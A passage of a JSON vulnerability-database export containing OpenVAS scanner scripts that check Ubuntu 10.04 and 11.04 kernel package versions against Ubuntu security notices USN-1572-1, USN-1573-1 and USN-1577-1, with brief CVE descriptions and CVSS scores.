isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-generic-pae\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-server\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-16-virtual\", ver:\"2.6.38-16.67~lucid1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:19:52", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1573-1", "modified": "2017-12-01T00:00:00", "published": "2012-09-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841156", "id": "OPENVAS:841156", "title": "Ubuntu Update for linux-ec2 USN-1573-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1573_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for linux-ec2 USN-1573-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n \n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1573-1\";\ntag_affected = \"linux-ec2 on Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1573-1/\");\n script_id(841156);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:38 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1573-1\");\n script_name(\"Ubuntu Update for linux-ec2 USN-1573-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-348-ec2\", ver:\"2.6.32-348.54\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:20:43", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1572-1", "modified": "2017-12-01T00:00:00", "published": "2012-09-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841155", "id": "OPENVAS:841155", "title": "Ubuntu Update for linux USN-1572-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1572_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for linux USN-1572-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n \n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1572-1\";\ntag_affected = \"linux on Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1572-1/\");\n script_id(841155);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:35 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1572-1\");\n script_name(\"Ubuntu Update for linux USN-1572-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-386\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-generic\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-generic-pae\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-ia64\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-lpia\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-powerpc\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-powerpc-smp\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-powerpc64-smp\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-preempt\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-server\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-sparc64\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-sparc64-smp\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-versatile\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-virtual\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-02T00:01:03", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1573-1", "modified": "2018-08-17T00:00:00", "published": "2012-09-22T00:00:00", "id": "OPENVAS:1361412562310841156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841156", "title": "Ubuntu Update for linux-ec2 USN-1573-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1573_1.nasl 11037 2018-08-17 11:51:16Z cfischer $\n#\n# Ubuntu Update for linux-ec2 USN-1573-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\n\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1573-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841156\");\n script_version(\"$Revision: 11037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-17 13:51:16 +0200 (Fri, 17 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:38 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1573-1\");\n script_name(\"Ubuntu Update for linux-ec2 USN-1573-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU10\\.04 LTS\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1573-1\");\n script_tag(name:\"affected\", value:\"linux-ec2 on Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n\n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-348-ec2\", ver:\"2.6.32-348.54\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:56", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1572-1", "modified": "2018-08-17T00:00:00", "published": "2012-09-22T00:00:00", "id": "OPENVAS:1361412562310841155", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841155", "title": "Ubuntu Update for linux USN-1572-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1572_1.nasl 11037 2018-08-17 11:51:16Z cfischer $\n#\n# Ubuntu Update for linux USN-1572-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\n\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1572-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841155\");\n script_version(\"$Revision: 11037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-17 13:51:16 +0200 (Fri, 17 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:35 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1572-1\");\n script_name(\"Ubuntu Update for linux USN-1572-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU10\\.04 LTS\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1572-1\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n\n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n\n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-386\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-generic\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-generic-pae\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-ia64\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-lpia\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-powerpc\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-powerpc-smp\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-powerpc64-smp\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-preempt\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-server\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-sparc64\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-sparc64-smp\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-versatile\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.32-43-virtual\", ver:\"2.6.32-43.97\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:20:46", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1577-1", "modified": "2017-12-01T00:00:00", "published": "2012-09-22T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=841159", "id": "OPENVAS:841159", "title": "Ubuntu Update for linux-ti-omap4 USN-1577-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1577_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1577-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A flaw was discovered in the Linux kernel's KVM (kernel virtual machine).\n An administrative user in the guest OS could leverage this flaw to cause a\n denial of service in the host OS. (CVE-2012-2121)\n\n Ben Hutchings reported a flaw in the Linux kernel with some network drivers\n that support TSO (TCP segment offload). A local or peer user could exploit\n this flaw to to cause a denial of service. (CVE-2012-3412)\n \n Jay Fenlason and Doug Ledford discovered a bug in the Linux kernel\n implementation of RDS sockets. A local unprivileged user could potentially\n use this flaw to read privileged information from the kernel.\n (CVE-2012-3430)\n \n A flaw was discovered in the madvise feature of the Linux kernel's memory\n subsystem. An unprivileged local use could exploit the flaw to cause a\n denial of service (crash the system). (CVE-2012-3511)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1577-1\";\ntag_affected = \"linux-ti-omap4 on Ubuntu 11.04\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1577-1/\");\n script_id(841159);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:47 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-2121\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1577-1\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1577-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.38-1209-omap4\", ver:\"2.6.38-1209.26\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:59:29", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1577-1", "modified": "2018-08-17T00:00:00", "published": "2012-09-22T00:00:00", "id": "OPENVAS:1361412562310841159", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841159", "title": "Ubuntu Update for linux-ti-omap4 USN-1577-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1577_1.nasl 11037 2018-08-17 11:51:16Z cfischer $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1577-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\n\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1577-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841159\");\n script_version(\"$Revision: 11037 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-17 13:51:16 +0200 (Fri, 17 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-09-22 11:59:47 +0530 (Sat, 22 Sep 2012)\");\n script_cve_id(\"CVE-2012-2121\", \"CVE-2012-3412\", \"CVE-2012-3430\", \"CVE-2012-3511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1577-1\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1577-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU11\\.04\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1577-1\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 11.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"A flaw was discovered in the Linux kernel's KVM (kernel virtual machine).\n An administrative user in the guest OS could leverage this flaw to cause a\n denial of service in the host OS. (CVE-2012-2121)\n\n Ben Hutchings reported a flaw in 